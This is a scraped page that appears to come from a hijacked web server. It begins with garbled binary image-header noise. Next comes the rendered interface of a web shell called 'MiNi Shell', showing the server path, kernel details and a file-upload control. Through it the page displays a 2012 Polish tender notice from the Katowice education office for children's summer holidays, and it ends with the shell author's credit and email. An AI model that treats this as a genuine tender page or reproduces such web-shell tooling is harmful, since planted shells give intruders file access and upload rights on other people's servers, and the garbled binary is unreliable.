JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120614/201792-N-2012.html

<p class="kh_header"><b>Katowice: Organizacja letniego wypoczynku dla dzieci i  młodzieży  z  terenu województwa śląskiego, z rodzin o niskich dochodach lub dotkniętych przypadkiem losowym lub klęską żywiołową.</b><br>
<b>Numer ogłoszenia: 201792 - 2012; data zamieszczenia: 14.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kuratorium Oświaty w Katowicach , ul. Jagiellońska 25, 40-032 Katowice, woj. śląskie, tel. 032 2571370, 2077439, faks 032 2555825.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kuratorium.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja letniego wypoczynku dla dzieci i  młodzieży  z  terenu województwa śląskiego, z rodzin o niskich dochodach lub dotkniętych przypadkiem losowym lub klęską żywiołową..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja letniego wypoczynku dla dzieci i  młodzieży z terenu województwa śląskiego, z rodzin o niskich dochodach lub dotkniętych przypadkiem losowym lub klęską żywiołową na terenie powiatów: pucki, nowodworski, lęborski (województwo pomorskie) dla 84 uczestników. Postępowanie o wartości szacunkowej nieprzekraczającej 130 000 euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje pobierania wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie zezwolenia do organizacji imprez turystycznych zgodnie z przepisami  ustawy o usługach turystycznych. Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu - Zaświadczenie organizatora turystyki wydane na podstawie  Ustawy z dnia 29 sierpnia 1997r. o usługach turystycznych (tekst jednolity Dz.U. z 2004r. Nr 223, poz. 2268 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata, to za okres obejmujący okres prowadzenia działalności  wykonał należycie co najmniej 3 usługi w zakresie  przedmiotu zamówienia o wartości nie mniejszej niż 40 000,00 zł brutto każda. Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu - Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych  również 	wykonywanych usług w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że te usługi  zostały wykonane lub są wykonywane należycie - zał. nr 6 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacja ekonomiczna:
Wykonawca musi wykazać, iż uzyskał obrót nie mniejszy niż  200 000,00 zł przynajmniej w jednym roku obrotowym w ciągu ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia  działalności jest krótszy - za ten okres (obrót - to przychód netto ze sprzedaży towarów i usług).

Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100 000,00 zł brutto.
Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentów - Sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inne dokumenty określające obroty oraz zobowiązania  i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. Opłacona polisa a w przypadku jej braku inny dokument  potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.

Sytuacja finansowa:
Wykonawca musi wykazać, iż posiada środki finansowe lub zdolność kredytową w wysokości minimum 100 000,00 zł brutto.Ocena spełnienia warunku udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie dokumentu - Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których 	wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków 	finansowych lub zdolność kredytową wykonawcy, wystawiona  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie o spełnieniu warunków wynikających z art. 22 ust. 1 ustawy Pzp - zał. nr 2 do SIWZ. 2. Oświadczenie, że wykonawca nie zalega z opłacaniem podatków lub że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu zał. nr 5 do SIWZ. 3.Oświadczenie, że wykonawca nie zalega z opłaceniem składek na ubezpieczenia zdrowotne i społeczne lub, że uzyskał  przewidziane prawem zwolnienie, odroczenia lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - zał. nr 5 do SIWZ.
4. Oświadczenie, iż wykonawca nie figuruje w Kartotece Karnej  Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Pzp - zał nr 5 do SIWZ. 
5. Wykonawca może polegać na  wiedzy i doświadczeniu, zdolności finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest 	udowodnić  zamawiającemu, iż będzie dysponował  zasobami niezbędnymi do realizacji  zamówienia - wypełnione oświadczenia (zał. Nr 7 i 8 SIWZ).
6. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość złożenia oferty przez dwa lub więcej podmiotów  np. konsorcjum). W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 
7. W przypadku  ustanowienia  pełnomocnika obowiązkowe jest  załączenie  	pełnomocnictwa. Pełnomocnictwo winno być złożone w oryginale lub kopii poświadczonej 	notarialnie.
8. Dokumenty wymienione w rozdz. VI pkt 2 ppkt 2.1. do 2.5 SIWZ winny być złożone 	przez każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
9. Oferta złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia	musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców 
występujących wspólnie (przez każdego z Wykonawcę lub przez pełnomocnika).
10. Wypełniony formularz Zgłoszenie złożenia ofert, stanowiący załącznik nr 1 do SIWZ.
11. Formularz ofertowy - zał. nr 9 SIWZ
12. Oświadczenie - zał. nr 10 SIWZ
13. Kosztorys ofertowy - zał. nr 11 SIWZ
14. Opis  okolicy i obiektu przeznaczonego na wypoczynek - zał. nr 12 SIWZ.
15. Wykaz pokoi  - zał. nr 13 SIWZ.
16. Wykaz bazy  rekreacyjno- sportowej i socjalnej - przeznaczonej do korzystania dla 	uczestników wypoczynku skierowanej przez Zamawiającego - zał. nr 14 SIWZ.
17. Program pobytu dzieci na wypoczynku -  zał.  nr 15 SIWZ.
18. Minimum  5 kolorowych  fotografii przedstawiających  zewnętrzny  i wewnętrzny widok obiektu przeznaczonego  do zakwaterowania  uczestników wypoczynku.
19. Wykonawca zobowiązany jest do wniesienia  zabezpieczenia należytego wykonania umowy  zgodnie z art. 147 ustawy  Prawo zamówień publicznych.
19.1. Wartość kwoty  zabezpieczenia ustala się w wysokości  3% ceny oferty.
19.2. Po dokonaniu wyboru oferty przez  Zamawiającego wykonawca  wnosi zabezpieczenie, w terminie poprzedzającym  podpisanie umowy.
19.3.	Zabezpieczenia należytego wykonania umowy wykonawca  dokonuje w wybranej przez siebie formie określonej w art.148  ust.1 ustawy Prawo zamówień publicznych
19.4.	Zamawiający zwraca zabezpieczenie  w terminie 30 dni od dnia wykonania zamówienia i uznania przez zamawiającego za należycie  wykonane.
19.5. W przypadku nienależytego wykonania umowy  będą potrącane kary z zabezpieczenia należytego wykonania umowy, a po jego wyczerpaniu z należnych Wykonawcy  środków za turnus, na którym  wystąpiło uchybienie.
19.6. Zabezpieczenie wpłacane w pieniądzu Wykonawca wpłaci przelewem na konto  Zamawiającego.  Nr konta:  NBP oo  K-ce  09 1010 1212 0050 9213 9120 0000.
20. Wykonawca przed podpisaniem umowy zobowiązany jest do dostarczenia do Zamawiającego w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujących  dokumentów:
a) dowodu dysponowania  obiektem  przeznaczonym na miejsce wypoczynku. W przypadku obiektów nie będących własnością  wykonawcy powinny to być umowy najmu, dzierżawy, leasingu, użyczenia  lub umowy przedwstępnej z właścicielem - w rozumieniu  przepisów kodeksu cywilnego.
b)  dokumentów potwierdzających dopuszczenie budynku do zamieszkania przez dzieci w rozumieniu przepisów rozporządzenia Ministra Edukacji Narodowej z dnia 21 	stycznia 1997r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku  dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania  (Dz.U. z 1997 Nr 12,  poz.67 z późn. zm):
- w przypadku organizowania wypoczynku w obiekcie używanym okazjonalnie 	szkic 	poszczególnych pomieszczeń obiektu, z określeniem ich funkcji, 	zawierający szkic pomieszczenia do spania, stołówki i pomieszczeń do zajęć wychowawczo - rekreacyjnych oraz  kopia wydanej właścicielowi, zarządcy lub użytkownikowi obiektu opinii właściwej miejscowo komendy powiatowej (miejskiej) Państwowej 	Staży Pożarnej lub protokołu okresowej kontroli Państwowej Straży Pożarnej, w zakresie spełnienia przez obiekt wymagań przeciwpożarowych;
- w przypadku organizowania wypoczynku w obiekcie hotelarskim  lub w innym obiekcie,  w którym są świadczone usługi hotelarskie, o którym mowa w rozporządzeniu Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz.U. z 2006r. Nr 22, poz. 169) kopia wydanej właścicielowi, zarządcy lub użytkownikowi obiektu opinii właściwej miejscowo komendy powiatowej (miejskiej) Państwowej Staży Pożarnej lub protokołu okresowej kontroli Państwowej Straży Pożarnej, w zakresie spełnienia przez obiekt wymagań przeciwpożarowych;
c)  oświadczenie Wykonawcy, że obiekt i teren  spełniają wymogi dotyczące bezpieczeństwa, ochrony przeciwpożarowej, warunków higieniczno-sanitarnych 	oraz ochrony środowiska  określonych przepisami o ochronie przeciwpożarowej, Państwowej Inspekcji Sanitarnej i ochronie środowiska.
21. Wykonawca zobowiązany jest do przedłożenia Zamawiającemu na dwa tygodnie przed 	rozpoczęciem każdego turnusu:
a) kserokopii  Zaświadczenia o zgłoszeniu wypoczynku wydanego przez kuratora oświaty 	  właściwego ze względu na miejsce siedziby lub zamieszkania organizatora wypoczynku (na każdy turnus oddzielnie).
b) kserokopii  Formularza zgłoszenia wypoczynku dzieci i młodzieży wraz z załącznikami  (na każdy turnus oddzielnie).
c) wykazu kadry przewidzianej do wykonania zamówienia. Do części A zał. nr 18 SIWZ należy dołączyć kserokopię dokumentów potwierdzających posiadanie wymaganych kwalifikacji zgodnie z § 11 i 12 rozporządzenia Ministra Edukacji Narodowej z dnia 21 stycznia 1997r. w sprawie warunków jakie muszą spełniać organizatorzy wypoczynku dla 	dzieci i młodzieży (Dz. U. z 1997r.  Nr 12,  poz. 67 z późn. zm.). Dokumenty  winny być  	potwierdzone przez Wykonawcę za zgodność z oryginałem.
d) ponownego przedłożenia Zamawiającemu ww. dokumentacji w przypadku dokonania 	jakichkolwiek zmian w zatrudnieniu kadry pedagogicznej.
e) odebrania u Zamawiającego przed rozpoczęciem każdego turnusu kart kwalifikacyjnych 	uczestników wypoczynku.
f) pisemnego powiadomienia Zamawiającego o miejscu zbiórki,  godzinie wyjazdu i powrotu dzieci z wypoczynku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Standard ośrodka oraz atrakcyjność programu - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kuratorium.katowice.pl - BIP - Zamówienia Publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kuratorium Oświaty w Katowicach ul. Jagiellońska 25, 40-032 Katowice pok. 449..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2012 godzina 10:00, miejsce: Kuratorium Oświaty w Katowicach ul. Jagiellońska 25, 40-032 Katowice pok. 449..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com